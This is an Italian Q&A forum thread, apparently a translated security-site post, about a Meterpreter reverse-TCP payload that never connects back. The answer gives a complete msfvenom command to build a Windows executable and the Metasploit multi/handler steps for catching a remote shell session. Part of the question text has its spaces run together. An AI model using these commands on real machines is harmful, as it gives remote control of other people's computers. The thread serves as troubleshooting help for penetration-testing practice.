Non accade nulla quando il payload funziona [chiuso]

1

Ho un problema con l'utilizzo di meterpreter. Ecco cosa ho fatto lo dirò usando le immagini di ciò che faccio passo dopo passo.

Per prima cosa ho creato il mio payload e ho impostato il LHOST sul mio indirizzo IP pubblico e lo ho generato.

equindiimpostareilmioLHOSTsulmioiplocaleequindieseguirlo.HocopiatoilmiocaricoutiletramiteFLASHDRIVEesonoandatoacasadelmioamico.Hoappenaeseguitosulsuocomputer(retediversa)maèdentroilmioflashdrive,nonl'hocopiatonelsuocomputer.(Lospiegoalmioamicodicosasitrattaehaottenutoilmiopermesso)

orailproblemaèchenonsuccedenulla.èdisponibilecon"Avvio del gestore del carico utile ...". Ho già configurato il mio router per port forwarding puoi vedere l'immagine qui sotto.

    
posta nethkennnnn 29.06.2017 - 19:21
fonte

1 risposta

1

In questo modo stai impostando Metasploit in uno stato di "ascolto". Ora ti manca l'altra parte. La "vittima" dovrebbe eseguire il file eseguibile generato e se la macchina vittima è in grado di connettersi alla macchina Metasploit, verrà aperta la sessione Meterpreter. Se la macchina Metasploit è protetta da un firewall, è necessario aprire la porta dal firewall alla macchina Metasploit. Un'altra cosa che ho visto male sui tuoi screenshot è LHOST non è la stessa sulla tua creazione di eseguibili e l'impostazione di LHOST sul payload Meterpreter. L'IP dovrebbe essere lo stesso, è l'IP della macchina Metasploit. Dal tuo esempio immagino che il tuo ip 124.x.x.x sia il tuo ip Metasploit.

Comunque, penso che sia più facile creare il file eseguibile usando msfvenom. Facendo questo (al di fuori di msfconsole):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=124.x.x.x LPORT=4444 -f exe > /some/path/hehe.exe

Sostituisci /some/path/ con un percorso esistente esistente su Linux per distribuire lì il file eseguibile.

Quindi su Metasploit dovresti eseguire solo questo:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 124.x.x.x
exploit

Dopo questo, Metasploit è pronto per ricevere connessioni. Quindi esegui il file eseguibile sulla macchina vittima e verrà aperta la sessione Meterpreter.

Insisto, è molto importante che la macchina vittima debba essere in grado di raggiungere l'ip della macchina Metasploit sul set di porte (4444 nell'esempio).

Buona fortuna.

    
risposta data 29.06.2017 - 19:41
fonte

Leggi altre domande sui tag